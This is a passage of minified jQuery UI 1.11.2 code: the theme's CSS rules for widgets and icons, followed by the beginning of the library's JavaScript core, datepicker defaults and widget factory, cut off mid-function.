.ui-resizable-handle{display:none}.ui-resizable-n{cursor:n-resize;height:7px;width:100%;top:-5px;left:0}.ui-resizable-s{cursor:s-resize;height:7px;width:100%;bottom:-5px;left:0}.ui-resizable-e{cursor:e-resize;width:7px;right:-5px;top:0;height:100%}.ui-resizable-w{cursor:w-resize;width:7px;left:-5px;top:0;height:100%}.ui-resizable-se{cursor:se-resize;width:12px;height:12px;right:1px;bottom:1px}.ui-resizable-sw{cursor:sw-resize;width:9px;height:9px;left:-5px;bottom:-5px}.ui-resizable-nw{cursor:nw-resize;width:9px;height:9px;left:-5px;top:-5px}.ui-resizable-ne{cursor:ne-resize;width:9px;height:9px;right:-5px;top:-5px}.ui-selectable{-ms-touch-action:none;touch-action:none}.ui-selectable-helper{position:absolute;z-index:100;border:1px dotted black}.ui-selectmenu-menu{padding:0;margin:0;position:absolute;top:0;left:0;display:none}.ui-selectmenu-menu .ui-menu{overflow:auto;overflow-x:hidden;padding-bottom:1px}.ui-selectmenu-menu .ui-menu .ui-selectmenu-optgroup{font-size:1em;font-weight:bold;line-height:1.5;padding:2px 0.4em;margin:0.5em 0 0 0;height:auto;border:0}.ui-selectmenu-open{display:block}.ui-selectmenu-button{display:inline-block;overflow:hidden;position:relative;text-decoration:none;cursor:pointer}.ui-selectmenu-button span.ui-icon{right:0.5em;left:auto;margin-top:-8px;position:absolute;top:50%}.ui-selectmenu-button span.ui-selectmenu-text{text-align:left;padding:0.4em 2.1em 0.4em 1em;display:block;line-height:1.4;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.ui-slider{position:relative;text-align:left}.ui-slider .ui-slider-handle{position:absolute;z-index:2;width:1.2em;height:1.2em;cursor:default;-ms-touch-action:none;touch-action:none}.ui-slider .ui-slider-range{position:absolute;z-index:1;font-size:.7em;display:block;border:0;background-position:0 0}.ui-slider.ui-state-disabled .ui-slider-handle,.ui-slider.ui-state-disabled .ui-slider-range{filter:inherit}.ui-slider-horizontal{height:.8em}.ui-slider-horizontal .ui-slider-handle{top:-.3em;margin-left:-.6em}.ui-slider-horizontal .ui-slider-range{top:0;height:100%}.ui-slider-horizontal .ui-slider-range-min{left:0}.ui-slider-horizontal .ui-slider-range-max{right:0}.ui-slider-vertical{width:.8em;height:100px}.ui-slider-vertical .ui-slider-handle{left:-.3em;margin-left:0;margin-bottom:-.6em}.ui-slider-vertical .ui-slider-range{left:0;width:100%}.ui-slider-vertical .ui-slider-range-min{bottom:0}.ui-slider-vertical .ui-slider-range-max{top:0}.ui-sortable-handle{-ms-touch-action:none;touch-action:none}.ui-spinner{position:relative;display:inline-block;overflow:hidden;padding:0;vertical-align:middle}.ui-spinner-input{border:none;background:none;color:inherit;padding:0;margin:.2em 0;vertical-align:middle;margin-left:.4em;margin-right:22px}.ui-spinner-button{width:16px;height:50%;font-size:.5em;padding:0;margin:0;text-align:center;position:absolute;cursor:default;display:block;overflow:hidden;right:0}.ui-spinner a.ui-spinner-button{border-top:none;border-bottom:none;border-right:none}.ui-spinner .ui-icon{position:absolute;margin-top:-8px;top:50%;left:0}.ui-spinner-up{top:0}.ui-spinner-down{bottom:0}.ui-spinner .ui-icon-triangle-1-s{background-position:-65px -16px}.ui-tabs{position:relative;padding:.2em}.ui-tabs .ui-tabs-nav{margin:0;padding:.2em .2em 0}.ui-tabs .ui-tabs-nav li{list-style:none;float:left;position:relative;top:0;margin:1px .2em 0 0;border-bottom-width:0;padding:0;white-space:nowrap}.ui-tabs .ui-tabs-nav .ui-tabs-anchor{float:left;padding:.5em 1em;text-decoration:none}.ui-tabs .ui-tabs-nav li.ui-tabs-active{margin-bottom:-1px;padding-bottom:1px}.ui-tabs .ui-tabs-nav li.ui-tabs-active .ui-tabs-anchor,.ui-tabs .ui-tabs-nav li.ui-state-disabled .ui-tabs-anchor,.ui-tabs .ui-tabs-nav li.ui-tabs-loading .ui-tabs-anchor{cursor:text}.ui-tabs-collapsible .ui-tabs-nav li.ui-tabs-active .ui-tabs-anchor{cursor:pointer}.ui-tabs .ui-tabs-panel{display:block;border-width:0;padding:1em 1.4em;background:none}.ui-tooltip{padding:8px;position:absolute;z-index:9999;max-width:300px;-webkit-box-shadow:0 0 5px #aaa;box-shadow:0 0 5px #aaa}body .ui-tooltip{border-width:2px}.ui-widget{font-family:Trebuchet MS,Tahoma,Verdana,Arial,sans-serif;font-size:1.1em}.ui-widget .ui-widget{font-size:1em}.ui-widget input,.ui-widget select,.ui-widget textarea,.ui-widget button{font-family:Trebuchet MS,Tahoma,Verdana,Arial,sans-serif;font-size:1em}.ui-widget-content{border:1px solid #ddd;background:#eee url("images/ui-bg_highlight-soft_100_eeeeee_1x100.png") 50% top repeat-x;color:#333}.ui-widget-content a{color:#333}.ui-widget-header{border:1px solid #e78f08;background:#f6a828 url("images/ui-bg_gloss-wave_35_f6a828_500x100.png") 50% 50% repeat-x;color:#fff;font-weight:bold}.ui-widget-header a{color:#fff}.ui-state-default,.ui-widget-content .ui-state-default,.ui-widget-header .ui-state-default{border:1px solid #ccc;background:#f6f6f6 url("images/ui-bg_glass_100_f6f6f6_1x400.png") 50% 50% repeat-x;font-weight:bold;color:#1c94c4}.ui-state-default a,.ui-state-default a:link,.ui-state-default a:visited{color:#1c94c4;text-decoration:none}.ui-state-hover,.ui-widget-content .ui-state-hover,.ui-widget-header .ui-state-hover,.ui-state-focus,.ui-widget-content .ui-state-focus,.ui-widget-header .ui-state-focus{border:1px solid #fbcb09;background:#fdf5ce url("images/ui-bg_glass_100_fdf5ce_1x400.png") 50% 50% repeat-x;font-weight:bold;color:#c77405}.ui-state-hover a,.ui-state-hover a:hover,.ui-state-hover a:link,.ui-state-hover a:visited,.ui-state-focus a,.ui-state-focus a:hover,.ui-state-focus a:link,.ui-state-focus a:visited{color:#c77405;text-decoration:none}.ui-state-active,.ui-widget-content .ui-state-active,.ui-widget-header .ui-state-active{border:1px solid #fbd850;background:#fff url("images/ui-bg_glass_65_ffffff_1x400.png") 50% 50% repeat-x;font-weight:bold;color:#eb8f00}.ui-state-active a,.ui-state-active a:link,.ui-state-active a:visited{color:#eb8f00;text-decoration:none}.ui-state-highlight,.ui-widget-content .ui-state-highlight,.ui-widget-header .ui-state-highlight{border:1px solid #fed22f;background:#ffe45c url("images/ui-bg_highlight-soft_75_ffe45c_1x100.png") 50% top repeat-x;color:#363636}.ui-state-highlight a,.ui-widget-content .ui-state-highlight a,.ui-widget-header .ui-state-highlight a{color:#363636}.ui-state-error,.ui-widget-content .ui-state-error,.ui-widget-header .ui-state-error{border:1px solid #cd0a0a;background:#b81900 url("images/ui-bg_diagonals-thick_18_b81900_40x40.png") 50% 50% repeat;color:#fff}.ui-state-error a,.ui-widget-content .ui-state-error a,.ui-widget-header .ui-state-error a{color:#fff}.ui-state-error-text,.ui-widget-content .ui-state-error-text,.ui-widget-header .ui-state-error-text{color:#fff}.ui-priority-primary,.ui-widget-content .ui-priority-primary,.ui-widget-header .ui-priority-primary{font-weight:bold}.ui-priority-secondary,.ui-widget-content .ui-priority-secondary,.ui-widget-header .ui-priority-secondary{opacity:.7;filter:Alpha(Opacity=70);font-weight:normal}.ui-state-disabled,.ui-widget-content .ui-state-disabled,.ui-widget-header .ui-state-disabled{opacity:.35;filter:Alpha(Opacity=35);background-image:none}.ui-state-disabled .ui-icon{filter:Alpha(Opacity=35)}.ui-icon{width:16px;height:16px}.ui-icon,.ui-widget-content .ui-icon{background-image:url("images/ui-icons_222222_256x240.png")}.ui-widget-header .ui-icon{background-image:url("images/ui-icons_ffffff_256x240.png")}.ui-state-default .ui-icon{background-image:url("images/ui-icons_ef8c08_256x240.png")}.ui-state-hover .ui-icon,.ui-state-focus .ui-icon{background-image:url("images/ui-icons_ef8c08_256x240.png")}.ui-state-active .ui-icon{background-image:url("images/ui-icons_ef8c08_256x240.png")}.ui-state-highlight .ui-icon{background-image:url("images/ui-icons_228ef1_256x240.png")}.ui-state-error .ui-icon,.ui-state-error-text .ui-icon{background-image:url("images/ui-icons_ffd27a_256x240.png")}.ui-icon-blank{background-position:16px 16px}.ui-icon-carat-1-n{background-position:0 0}.ui-icon-carat-1-ne{background-position:-16px 0}.ui-icon-carat-1-e{background-position:-32px 0}.ui-icon-carat-1-se{background-position:-48px 0}.ui-icon-carat-1-s{background-position:-64px 0}.ui-icon-carat-1-sw{background-position:-80px 0}.ui-icon-carat-1-w{background-position:-96px 0}.ui-icon-carat-1-nw{background-position:-112px 0}.ui-icon-carat-2-n-s{background-position:-128px 0}.ui-icon-carat-2-e-w{background-position:-144px 0}.ui-icon-triangle-1-n{background-position:0 -16px}.ui-icon-triangle-1-ne{background-position:-16px -16px}.ui-icon-triangle-1-e{background-position:-32px -16px}.ui-icon-triangle-1-se{background-position:-48px -16px}.ui-icon-triangle-1-s{background-position:-64px -16px}.ui-icon-triangle-1-sw{background-position:-80px -16px}.ui-icon-triangle-1-w{background-position:-96px -16px}.ui-icon-triangle-1-nw{background-position:-112px -16px}.ui-icon-triangle-2-n-s{background-position:-128px -16px}.ui-icon-triangle-2-e-w{background-position:-144px -16px}.ui-icon-arrow-1-n{background-position:0 -32px}.ui-icon-arrow-1-ne{background-position:-16px -32px}.ui-icon-arrow-1-e{background-position:-32px -32px}.ui-icon-arrow-1-se{background-position:-48px -32px}.ui-icon-arrow-1-s{background-position:-64px -32px}.ui-icon-arrow-1-sw{background-position:-80px -32px}.ui-icon-arrow-1-w{background-position:-96px -32px}.ui-icon-arrow-1-nw{background-position:-112px -32px}.ui-icon-arrow-2-n-s{background-position:-128px -32px}.ui-icon-arrow-2-ne-sw{background-position:-144px -32px}.ui-icon-arrow-2-e-w{background-position:-160px -32px}.ui-icon-arrow-2-se-nw{background-position:-176px -32px}.ui-icon-arrowstop-1-n{background-position:-192px -32px}.ui-icon-arrowstop-1-e{background-position:-208px -32px}.ui-icon-arrowstop-1-s{background-position:-224px -32px}.ui-icon-arrowstop-1-w{background-position:-240px -32px}.ui-icon-arrowthick-1-n{background-position:0 -48px}.ui-icon-arrowthick-1-ne{background-position:-16px -48px}.ui-icon-arrowthick-1-e{background-position:-32px -48px}.ui-icon-arrowthick-1-se{background-position:-48px -48px}.ui-icon-arrowthick-1-s{background-position:-64px -48px}.ui-icon-arrowthick-1-sw{background-position:-80px -48px}.ui-icon-arrowthick-1-w{background-position:-96px -48px}.ui-icon-arrowthick-1-nw{background-position:-112px -48px}.ui-icon-arrowthick-2-n-s{background-position:-128px -48px}.ui-icon-arrowthick-2-ne-sw{background-position:-144px -48px}.ui-icon-arrowthick-2-e-w{background-position:-160px -48px}.ui-icon-arrowthick-2-se-nw{background-position:-176px -48px}.ui-icon-arrowthickstop-1-n{background-position:-192px -48px}.ui-icon-arrowthickstop-1-e{background-position:-208px -48px}.ui-icon-arrowthickstop-1-s{background-position:-224px -48px}.ui-icon-arrowthickstop-1-w{background-position:-240px -48px}.ui-icon-arrowreturnthick-1-w{background-position:0 -64px}.ui-icon-arrowreturnthick-1-n{background-position:-16px -64px}.ui-icon-arrowreturnthick-1-e{background-position:-32px -64px}.ui-icon-arrowreturnthick-1-s{background-position:-48px -64px}.ui-icon-arrowreturn-1-w{background-position:-64px -64px}.ui-icon-arrowreturn-1-n{background-position:-80px -64px}.ui-icon-arrowreturn-1-e{background-position:-96px -64px}.ui-icon-arrowreturn-1-s{background-position:-112px -64px}.ui-icon-arrowrefresh-1-w{background-position:-128px -64px}.ui-icon-arrowrefresh-1-n{background-position:-144px -64px}.ui-icon-arrowrefresh-1-e{background-position:-160px -64px}.ui-icon-arrowrefresh-1-s{background-position:-176px -64px}.ui-icon-arrow-4{background-position:0 -80px}.ui-icon-arrow-4-diag{background-position:-16px -80px}.ui-icon-extlink{background-position:-32px -80px}.ui-icon-newwin{background-position:-48px -80px}.ui-icon-refresh{background-position:-64px -80px}.ui-icon-shuffle{background-position:-80px -80px}.ui-icon-transfer-e-w{background-position:-96px -80px}.ui-icon-transferthick-e-w{background-position:-112px -80px}.ui-icon-folder-collapsed{background-position:0 -96px}.ui-icon-folder-open{background-position:-16px -96px}.ui-icon-document{background-position:-32px -96px}.ui-icon-document-b{background-position:-48px -96px}.ui-icon-note{background-position:-64px -96px}.ui-icon-mail-closed{background-position:-80px -96px}.ui-icon-mail-open{background-position:-96px -96px}.ui-icon-suitcase{background-position:-112px -96px}.ui-icon-comment{background-position:-128px -96px}.ui-icon-person{background-position:-144px -96px}.ui-icon-print{background-position:-160px -96px}.ui-icon-trash{background-position:-176px -96px}.ui-icon-locked{background-position:-192px -96px}.ui-icon-unlocked{background-position:-208px -96px}.ui-icon-bookmark{background-position:-224px -96px}.ui-icon-tag{background-position:-240px -96px}.ui-icon-home{background-position:0 -112px}.ui-icon-flag{background-position:-16px -112px}.ui-icon-calendar{background-position:-32px -112px}.ui-icon-cart{background-position:-48px -112px}.ui-icon-pencil{background-position:-64px -112px}.ui-icon-clock{background-position:-80px -112px}.ui-icon-disk{background-position:-96px -112px}.ui-icon-calculator{background-position:-112px -112px}.ui-icon-zoomin{background-position:-128px -112px}.ui-icon-zoomout{background-position:-144px -112px}.ui-icon-search{background-position:-160px -112px}.ui-icon-wrench{background-position:-176px -112px}.ui-icon-gear{background-position:-192px -112px}.ui-icon-heart{background-position:-208px -112px}.ui-icon-star{background-position:-224px -112px}.ui-icon-link{background-position:-240px -112px}.ui-icon-cancel{background-position:0 -128px}.ui-icon-plus{background-position:-16px -128px}.ui-icon-plusthick{background-position:-32px -128px}.ui-icon-minus{background-position:-48px -128px}.ui-icon-minusthick{background-position:-64px -128px}.ui-icon-close{background-position:-80px -128px}.ui-icon-closethick{background-position:-96px -128px}.ui-icon-key{background-position:-112px -128px}.ui-icon-lightbulb{background-position:-128px -128px}.ui-icon-scissors{background-position:-144px -128px}.ui-icon-clipboard{background-position:-160px -128px}.ui-icon-copy{background-position:-176px -128px}.ui-icon-contact{background-position:-192px -128px}.ui-icon-image{background-position:-208px -128px}.ui-icon-video{background-position:-224px -128px}.ui-icon-script{background-position:-240px -128px}.ui-icon-alert{background-position:0 -144px}.ui-icon-info{background-position:-16px -144px}.ui-icon-notice{background-position:-32px -144px}.ui-icon-help{background-position:-48px -144px}.ui-icon-check{background-position:-64px -144px}.ui-icon-bullet{background-position:-80px -144px}.ui-icon-radio-on{background-position:-96px -144px}.ui-icon-radio-off{background-position:-112px -144px}.ui-icon-pin-w{background-position:-128px -144px}.ui-icon-pin-s{background-position:-144px -144px}.ui-icon-play{background-position:0 -160px}.ui-icon-pause{background-position:-16px -160px}.ui-icon-seek-next{background-position:-32px -160px}.ui-icon-seek-prev{background-position:-48px -160px}.ui-icon-seek-end{background-position:-64px -160px}.ui-icon-seek-start{background-position:-80px -160px}.ui-icon-seek-first{background-position:-80px -160px}.ui-icon-stop{background-position:-96px -160px}.ui-icon-eject{background-position:-112px -160px}.ui-icon-volume-off{background-position:-128px -160px}.ui-icon-volume-on{background-position:-144px -160px}.ui-icon-power{background-position:0 -176px}.ui-icon-signal-diag{background-position:-16px -176px}.ui-icon-signal{background-position:-32px -176px}.ui-icon-battery-0{background-position:-48px -176px}.ui-icon-battery-1{background-position:-64px -176px}.ui-icon-battery-2{background-position:-80px -176px}.ui-icon-battery-3{background-position:-96px -176px}.ui-icon-circle-plus{background-position:0 -192px}.ui-icon-circle-minus{background-position:-16px -192px}.ui-icon-circle-close{background-position:-32px -192px}.ui-icon-circle-triangle-e{background-position:-48px -192px}.ui-icon-circle-triangle-s{background-position:-64px -192px}.ui-icon-circle-triangle-w{background-position:-80px -192px}.ui-icon-circle-triangle-n{background-position:-96px -192px}.ui-icon-circle-arrow-e{background-position:-112px -192px}.ui-icon-circle-arrow-s{background-position:-128px -192px}.ui-icon-circle-arrow-w{background-position:-144px -192px}.ui-icon-circle-arrow-n{background-position:-160px -192px}.ui-icon-circle-zoomin{background-position:-176px -192px}.ui-icon-circle-zoomout{background-position:-192px -192px}.ui-icon-circle-check{background-position:-208px -192px}.ui-icon-circlesmall-plus{background-position:0 -208px}.ui-icon-circlesmall-minus{background-position:-16px -208px}.ui-icon-circlesmall-close{background-position:-32px -208px}.ui-icon-squaresmall-plus{background-position:-48px -208px}.ui-icon-squaresmall-minus{background-position:-64px -208px}.ui-icon-squaresmall-close{background-position:-80px -208px}.ui-icon-grip-dotted-vertical{background-position:0 -224px}.ui-icon-grip-dotted-horizontal{background-position:-16px -224px}.ui-icon-grip-solid-vertical{background-position:-32px -224px}.ui-icon-grip-solid-horizontal{background-position:-48px -224px}.ui-icon-gripsmall-diagonal-se{background-position:-64px -224px}.ui-icon-grip-diagonal-se{background-position:-80px -224px}.ui-corner-all,.ui-corner-top,.ui-corner-left,.ui-corner-tl{border-top-left-radius:4px}.ui-corner-all,.ui-corner-top,.ui-corner-right,.ui-corner-tr{border-top-right-radius:4px}.ui-corner-all,.ui-corner-bottom,.ui-corner-left,.ui-corner-bl{border-bottom-left-radius:4px}.ui-corner-all,.ui-corner-bottom,.ui-corner-right,.ui-corner-br{border-bottom-right-radius:4px}.ui-widget-overlay{background:#666 url("images/ui-bg_diagonals-thick_20_666666_40x40.png") 50% 50% repeat;opacity:.5;filter:Alpha(Opacity=50)}.ui-widget-shadow{margin:-5px 0 0 -5px;padding:5px;background:#000 url("images/ui-bg_flat_10_000000_40x100.png") 50% 50% repeat-x;opacity:.2;filter:Alpha(Opacity=20);border-radius:5px}/*! jQuery UI - v1.11.2 - 2014-10-16
* http://jqueryui.com
* Includes: core.js, widget.js, mouse.js, position.js, accordion.js, autocomplete.js, button.js, datepicker.js, dialog.js, draggable.js, droppable.js, effect.js, effect-blind.js, effect-bounce.js, effect-clip.js, effect-drop.js, effect-explode.js, effect-fade.js, effect-fold.js, effect-highlight.js, effect-puff.js, effect-pulsate.js, effect-scale.js, effect-shake.js, effect-size.js, effect-slide.js, effect-transfer.js, menu.js, progressbar.js, resizable.js, selectable.js, selectmenu.js, slider.js, sortable.js, spinner.js, tabs.js, tooltip.js
* Copyright 2014 jQuery Foundation and other contributors; Licensed MIT */

(function(e){"function"==typeof define&&define.amd?define(["jquery"],e):e(jQuery)})(function(e){function t(t,s){var n,a,o,r=t.nodeName.toLowerCase();return"area"===r?(n=t.parentNode,a=n.name,t.href&&a&&"map"===n.nodeName.toLowerCase()?(o=e("img[usemap='#"+a+"']")[0],!!o&&i(o)):!1):(/input|select|textarea|button|object/.test(r)?!t.disabled:"a"===r?t.href||s:s)&&i(t)}function i(t){return e.expr.filters.visible(t)&&!e(t).parents().addBack().filter(function(){return"hidden"===e.css(this,"visibility")}).length}function s(e){for(var t,i;e.length&&e[0]!==document;){if(t=e.css("position"),("absolute"===t||"relative"===t||"fixed"===t)&&(i=parseInt(e.css("zIndex"),10),!isNaN(i)&&0!==i))return i;e=e.parent()}return 0}function n(){this._curInst=null,this._keyEvent=!1,this._disabledInputs=[],this._datepickerShowing=!1,this._inDialog=!1,this._mainDivId="ui-datepicker-div",this._inlineClass="ui-datepicker-inline",this._appendClass="ui-datepicker-append",this._triggerClass="ui-datepicker-trigger",this._dialogClass="ui-datepicker-dialog",this._disableClass="ui-datepicker-disabled",this._unselectableClass="ui-datepicker-unselectable",this._currentClass="ui-datepicker-current-day",this._dayOverClass="ui-datepicker-days-cell-over",this.regional=[],this.regional[""]={closeText:"Done",prevText:"Prev",nextText:"Next",currentText:"Today",monthNames:["January","February","March","April","May","June","July","August","September","October","November","December"],monthNamesShort:["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],dayNames:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],dayNamesShort:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],dayNamesMin:["Su","Mo","Tu","We","Th","Fr","Sa"],weekHeader:"Wk",dateFormat:"mm/dd/yy",firstDay:0,isRTL:!1,showMonthAfterYear:!1,yearSuffix:""},this._defaults={showOn:"focus",showAnim:"fadeIn",showOptions:{},defaultDate:null,appendText:"",buttonText:"...",buttonImage:"",buttonImageOnly:!1,hideIfNoPrevNext:!1,navigationAsDateFormat:!1,gotoCurrent:!1,changeMonth:!1,changeYear:!1,yearRange:"c-10:c+10",showOtherMonths:!1,selectOtherMonths:!1,showWeek:!1,calculateWeek:this.iso8601Week,shortYearCutoff:"+10",minDate:null,maxDate:null,duration:"fast",beforeShowDay:null,beforeShow:null,onSelect:null,onChangeMonthYear:null,onClose:null,numberOfMonths:1,showCurrentAtPos:0,stepMonths:1,stepBigMonths:12,altField:"",altFormat:"",constrainInput:!0,showButtonPanel:!1,autoSize:!1,disabled:!1},e.extend(this._defaults,this.regional[""]),this.regional.en=e.extend(!0,{},this.regional[""]),this.regional["en-US"]=e.extend(!0,{},this.regional.en),this.dpDiv=a(e("<div id='"+this._mainDivId+"' class='ui-datepicker ui-widget ui-widget-content ui-helper-clearfix ui-corner-all'></div>"))}function a(t){var i="button, .ui-datepicker-prev, .ui-datepicker-next, .ui-datepicker-calendar td a";return t.delegate(i,"mouseout",function(){e(this).removeClass("ui-state-hover"),-1!==this.className.indexOf("ui-datepicker-prev")&&e(this).removeClass("ui-datepicker-prev-hover"),-1!==this.className.indexOf("ui-datepicker-next")&&e(this).removeClass("ui-datepicker-next-hover")}).delegate(i,"mouseover",o)}function o(){e.datepicker._isDisabledDatepicker(v.inline?v.dpDiv.parent()[0]:v.input[0])||(e(this).parents(".ui-datepicker-calendar").find("a").removeClass("ui-state-hover"),e(this).addClass("ui-state-hover"),-1!==this.className.indexOf("ui-datepicker-prev")&&e(this).addClass("ui-datepicker-prev-hover"),-1!==this.className.indexOf("ui-datepicker-next")&&e(this).addClass("ui-datepicker-next-hover"))}function r(t,i){e.extend(t,i);for(var s in i)null==i[s]&&(t[s]=i[s]);return t}function h(e){return function(){var t=this.element.val();e.apply(this,arguments),this._refresh(),t!==this.element.val()&&this._trigger("change")}}e.ui=e.ui||{},e.extend(e.ui,{version:"1.11.2",keyCode:{BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38}}),e.fn.extend({scrollParent:function(t){var i=this.css("position"),s="absolute"===i,n=t?/(auto|scroll|hidden)/:/(auto|scroll)/,a=this.parents().filter(function(){var t=e(this);return s&&"static"===t.css("position")?!1:n.test(t.css("overflow")+t.css("overflow-y")+t.css("overflow-x"))}).eq(0);return"fixed"!==i&&a.length?a:e(this[0].ownerDocument||document)},uniqueId:function(){var e=0;return function(){return this.each(function(){this.id||(this.id="ui-id-"+ ++e)})}}(),removeUniqueId:function(){return this.each(function(){/^ui-id-\d+$/.test(this.id)&&e(this).removeAttr("id")})}}),e.extend(e.expr[":"],{data:e.expr.createPseudo?e.expr.createPseudo(function(t){return function(i){return!!e.data(i,t)}}):function(t,i,s){return!!e.data(t,s[3])},focusable:function(i){return t(i,!isNaN(e.attr(i,"tabindex")))},tabbable:function(i){var s=e.attr(i,"tabindex"),n=isNaN(s);return(n||s>=0)&&t(i,!n)}}),e("<a>").outerWidth(1).jquery||e.each(["Width","Height"],function(t,i){function s(t,i,s,a){return e.each(n,function(){i-=parseFloat(e.css(t,"padding"+this))||0,s&&(i-=parseFloat(e.css(t,"border"+this+"Width"))||0),a&&(i-=parseFloat(e.css(t,"margin"+this))||0)}),i}var n="Width"===i?["Left","Right"]:["Top","Bottom"],a=i.toLowerCase(),o={innerWidth:e.fn.innerWidth,innerHeight:e.fn.innerHeight,outerWidth:e.fn.outerWidth,outerHeight:e.fn.outerHeight};e.fn["inner"+i]=function(t){return void 0===t?o["inner"+i].call(this):this.each(function(){e(this).css(a,s(this,t)+"px")})},e.fn["outer"+i]=function(t,n){return"number"!=typeof t?o["outer"+i].call(this,t):this.each(function(){e(this).css(a,s(this,t,!0,n)+"px")})}}),e.fn.addBack||(e.fn.addBack=function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}),e("<a>").data("a-b","a").removeData("a-b").data("a-b")&&(e.fn.removeData=function(t){return function(i){return arguments.length?t.call(this,e.camelCase(i)):t.call(this)}}(e.fn.removeData)),e.ui.ie=!!/msie [\w.]+/.exec(navigator.userAgent.toLowerCase()),e.fn.extend({focus:function(t){return function(i,s){return"number"==typeof i?this.each(function(){var t=this;setTimeout(function(){e(t).focus(),s&&s.call(t)},i)}):t.apply(this,arguments)}}(e.fn.focus),disableSelection:function(){var e="onselectstart"in document.createElement("div")?"selectstart":"mousedown";return function(){return this.bind(e+".ui-disableSelection",function(e){e.preventDefault()})}}(),enableSelection:function(){return this.unbind(".ui-disableSelection")},zIndex:function(t){if(void 0!==t)return this.css("zIndex",t);if(this.length)for(var i,s,n=e(this[0]);n.length&&n[0]!==document;){if(i=n.css("position"),("absolute"===i||"relative"===i||"fixed"===i)&&(s=parseInt(n.css("zIndex"),10),!isNaN(s)&&0!==s))return s;n=n.parent()}return 0}}),e.ui.plugin={add:function(t,i,s){var n,a=e.ui[t].prototype;for(n in s)a.plugins[n]=a.plugins[n]||[],a.plugins[n].push([i,s[n]])},call:function(e,t,i,s){var n,a=e.plugins[t];if(a&&(s||e.element[0].parentNode&&11!==e.element[0].parentNode.nodeType))for(n=0;a.length>n;n++)e.options[a[n][0]]&&a[n][1].apply(e.element,i)}};var l=0,u=Array.prototype.slice;e.cleanData=function(t){return function(i){var s,n,a;for(a=0;null!=(n=i[a]);a++)try{s=e._data(n,"events"),s&&s.remove&&e(n).triggerHandler("remove")}catch(o){}t(i)}}(e.cleanData),e.widget=function(t,i,s){var n,a,o,r,h={},l=t.split(".")[0];return t=t.split(".")[1],n=l+"-"+t,s||(s=i,i=e.Widget),e.expr[":"][n.toLowerCase()]=function(t){return!!e.data(t,n)},e[l]=e[l]||{},a=e[l][t],o=e[l][t]=function(e,t){return this._createWidget?(arguments.length&&this._createWidget(e,t),void 0):new o(e,t)},e.extend(o,a,{version:s.version,_proto:e.extend({},s),_childConstructors:[]}),r=new i,r.options=e.widget.extend({},r.options),e.each(s,function(t,s){return e.isFunction(s)?(h[t]=function(){var e=function(){return i.prototype[t].apply(this,arguments)},n=function(e){return i.prototype[t].apply(this,e)};return function(){var t,i=this._super,a=this._superApply;return this._super=e,this._superApply=n,t=s.apply(this,arguments),this._super=i,this._superApply=a,t}}(),void 0):(h[t]=s,void 0)}),o.prototype=e.widget.extend(r,{widgetEventPrefix:a?r.widgetEventPrefix||t:t},h,{constructor:o,namespace:l,widgetName:t,widgetFullName:n}),a?(e.each(a._childConstructors,function(t,i){var s=i.prototype;e.widget(s.namespace+"."+s.widgetName,o,i._proto)}),delete a._childConstructors):i._childConstructors.push(o),e.widget.bridge(t,o),o},e.widget.extend=function(t){for(var i,s,n=u.call(arguments,1),a=0,o=n.length;o>a;a++)for(i in n[a])s=n[a][i],n[a].hasOwnProperty(i)&&void 0!==s&&(t[i]=e.isPlainObject(s)?e.isPlainObject(t[i])?e.widget.extend({},t[i],s):e.widget.extend({},s):s);return t},e.widget.bridge=function(t,i){var s=i.prototype.widgetFullName||t;e.fn[t]=function(n){var a="string"==typeof n,o=u.call(arguments,1),r=this;return n=!a&&o.length?e.widget.extend.apply(null,[n].concat(o)):n,a?this.each(function(){var i,a=e.data(this,s);return"instance"===n?(r=a,!1):a?e.isFunction(a[n])&&"_"!==n.charAt(0)?(i=a[n].apply(a,o),i!==a&&void 0!==i?(r=i&&i.jquery?r.pushStack(i.get()):i,!1):void 0):e.error("no such method '"+n+"' for "+t+" widget instance"):e.error("cannot call methods on "+t+" prior to initialization; "+"attempted to call method '"+n+"'")}):this.each(function(){var t=e.data(this,s);t?(t.option(n||{}),t._init&&t._init()):e.data(this,s,new i(n,this))}),r}},e.Widget=function(){},e.Widget._childConstructors=[],e.Widget.prototype={widgetName:"widget",widgetEventPrefix:"",defaultElement:"<div>",options:{disabled:!1,create:null},_createWidget:function(t,i){i=e(i||this.defaultElement||this)[0],this.element=e(i),this.uuid=l++,this.eventNamespace="."+this.widgetName+this.uuid,this.bindings=e(),this.hoverable=e(),this.focusable=e(),i!==this&&(e.data(i,this.widgetFullName,this),this._on(!0,this.element,{remove:function(e){e.target===i&&this.destroy()}}),this.document=e(i.style?i.ownerDocument:i.document||i),this.window=e(this.document[0].defaultView||this.document[0].parentWindow)),this.options=e.widget.extend({},this.options,this._getCreateOptions(),t),this._create(),this._trigger("create",null,this._getCreateEventData()),this._init()},_getCreateOptions:e.noop,_getCreateEventData:e.noop,_create:e.noop,_init:e.noop,destroy:function(){this._destroy(),this.element.unbind(this.eventNamespace).removeData(this.widgetFullName).removeData(e.camelCase(this.widgetFullName)),this.widget().unbind(this.eventNamespace).removeAttr("aria-disabled").removeClass(this.widgetFullName+"-disabled "+"ui-state-disabled"),this.bindings.unbind(this.eventNamespace),this.hoverable.removeClass("ui-state-hover"),this.focusable.removeClass("ui-state-focus")},_destroy:e.noop,widget:function(){return this.element},option:function(t,i){var s,n,a,o=t;if(0===arguments.length)return e.widget.extend({},this.options);if("string"==typeof t)if(o={},s=t.split("."),t=s.shift(),s.length){for(n=o[t]=e.widget.extend({},this.options[t]),a=0;s.length-1>a;a++)n[s[a]]=n[s[a]]||{},n=n[s[a]];if(t=s.pop(),1===arguments.length)return void 0===n[t]?null:n[t];n[t]=i}else{if(1===arguments.length)return void 0===this.options[t]?null:this.options[t];o[t]=i}return this._setOptions(o),this},_setOptions:function(e){var t;for(t in e)this._setOption(t,e[t]);return this},_setOption:function(e,t){return this.options[e]=t,"disabled"===e&&(this.widget().toggleClass(this.widgetFullName+"-disabled",!!t),t&&(this.hoverable.removeClass("ui-state-hover"),this.focusable.removeClass("ui-state-focus"))),this},enable:function(){return this._setOptions({disabled:!1})},disable:function(){return 